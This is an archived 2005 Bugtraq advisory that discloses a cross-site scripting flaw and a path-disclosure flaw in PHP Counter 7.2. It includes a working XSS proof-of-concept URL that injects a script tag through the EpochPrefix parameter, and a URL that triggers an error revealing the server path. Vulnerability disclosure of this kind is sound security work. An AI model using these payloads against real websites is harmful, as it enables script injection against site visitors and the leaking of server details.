[39623] in bugtraq
Path Disclosure and XSS problem in PHP Counter 7.2
daemon@ATHENA.MIT.EDU (priestmaster)
Wed Jul 13 18:50:17 2005
Date: Wed, 13 Jul 2005 12:53:04 +0200
Message-Id: <200507131253.AA790037062@priestmaster.org>
Mime-Version: 1.0
Content-Type: multipart/mixed;boundary="==IMail_v8.1=="
From: "priestmaster" <priest@priestmaster.org>
Reply-To: <priest@priestmaster.org>
To: <bugtraq@securityfocus.com>
------------------------------------------------------------------------
This mail message contains standard MIME attachments. If you see this
note, your e-mail program does not support MIME. You may need a MIME-
compliant mail reader to read any non-text attachments in this message.
------------------------------------------------------------------------
--==IMail_v8.1==
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Hi,
I found two vulnerabillities in PHP Counter 7.2
PHP Counter Vendor:
http://www.ekstreme.com/phplabs/phpcounter.php
First an XSS problem (file phpcounterxss.txt)
Second a Path disclosure vulnerabillity (file phpcounterdir.txt).
greets,
priestmaster
Mail: <priest@priestmaster.org>
URL: http://www.priestmaster.org
--==IMail_v8.1==
Content-Type: text/plain; name="phpcountxss.txt"
Content-Transfer-Encoding: 7bit
----------------------------------------------------------
---- Team priestmasters PHP Counter 7.2 XSS Advisorie ----
----------------------------------------------------------
PHP Counter Vendor:
http://www.ekstreme.com/phplabs/phpcounter.php
PHP Counter 7.2 does not filter "<>" tags in EpochPrefix
parameter. Cross site scripting and HTML injection is possible.
Exploitation:
http://www.yourwebsite.org/CounterDirectory/index.php?Plugin=All%20Hits&EpochPrefix="></a></div><script>a=/XSS/%0aalert(a.source)</script>
The injected script is called multiple times.
XSS is hard to do because ' and " are filtered.
greets,
priestmaster
URL: http://www.priestmaster.org
Email: priest@priestmaster.org
--==IMail_v8.1==
Content-Type: text/plain; name="phpcountdir.txt"
Content-Transfer-Encoding: 7bit
------------------------------------------------------------
-------- Team priestasters PHP Counter 7.2 Advisorie -------
---------------- Path disclosure vulnerabillity ------------
------------------------------------------------------------
PHP Counter Vendor:
http://www.ekstreme.com/phplabs/phpcounter.php
A Path disclosure vuln exist in prelims.php
Exploitation is simple:
http://www.yoursite.com/CounterPath/prelims.php
Output look like this:
Fatal error: Call to undefined function: getdawn()
in /home/.sites/165/site223/web/Counter/prelims.php on line 63
That's all :-)
priestmaster
--==IMail_v8.1==--
